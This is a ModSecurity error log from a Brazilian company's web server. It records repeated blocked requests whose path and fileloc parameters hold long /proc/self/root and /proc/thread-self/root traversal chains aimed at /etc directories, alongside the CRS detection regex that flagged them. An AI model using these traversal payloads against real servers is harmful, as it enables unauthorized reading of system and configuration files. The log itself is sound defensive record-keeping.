[Fri Mar 20 05:10:11.562500 2026] [:error] [pid 11167:tid 140411590858496] [client 74.7.241.31:34204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0A4_HIg5MgXLBnicPYrgAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:10:13.886570 2026] [:error] [pid 21219:tid 140411599251200] [client 74.7.241.31:48258] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0A5fXLqtnMIWvjpaJ4cgAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:10:16.183934 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.241.31:48264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0A6PXLqtnMIWvjpaJ4dAAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:10:17.459048 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:51606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0A6eoXxyEfFpUF8f9gxQAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:10:20.655443 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.241.31:51616] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0A6zJ3M9BSuKP7CAbxHQAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:10:22.937869 2026] [:error] [pid 11642:tid 140411574073088] [client 74.7.243.128:32958] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0A7rninkcc-iUj5Ao9JAAAA5Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:10:23.190160 2026] [:error] [pid 31215:tid 140411741927168] [client 74.7.241.31:51628] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0A7wF0L0L-SsrnPo5G_wAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:10:29.021014 2026] [:error] [pid 11642:tid 140411699963648] [client 74.7.241.31:51644] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0A9bninkcc-iUj5Ao9KQAAA4U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:10:30.296688 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:57784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0A9ta6ubjKNq_cu4av6wAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:10:32.619787 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.241.31:57792] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0A-BCii7xarUs8iHZE8gAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:10:33.504190 2026] [:error] [pid 31215:tid 140411733534464] [client 74.7.241.31:57798] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0A-QF0L0L-SsrnPo5HBQAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:10:38.580583 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.241.31:57800] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0A_fXLqtnMIWvjpaJ4egAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:10:41.076218 2026] [:error] [pid 11167:tid 140411674785536] [client 74.7.241.31:49638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BAfHIg5MgXLBnicPYvQAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:11:04.308096 2026] [:error] [pid 21219:tid 140411649607424] [client 74.7.241.31:49654] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BF_XLqtnMIWvjpaJ4kwAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:11:14.680826 2026] [:error] [pid 9818:tid 140411616036608] [client 74.7.243.128:47310] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BIl1pVZ5mVmJwsFMOeQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 05:11:15.075453 2026] [:error] [pid 7235:tid 140411741927168] [client 74.7.241.31:44318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BI_qxLDW4GITHUkTBTQAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:11:16.054960 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.243.128:35984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BJDJ3M9BSuKP7CAbxSQAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:11:16.390475 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.241.31:57376] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BJBCii7xarUs8iHZFCAAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:11:18.899428 2026] [:error] [pid 9818:tid 140411699963648] [client 74.7.241.31:60534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BJl1pVZ5mVmJwsFMOewAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:11:19.367367 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.241.31:60534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BJ11pVZ5mVmJwsFMOfAAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:11:21.959528 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.243.128:35992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0BKTJ3M9BSuKP7CAbxVAAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
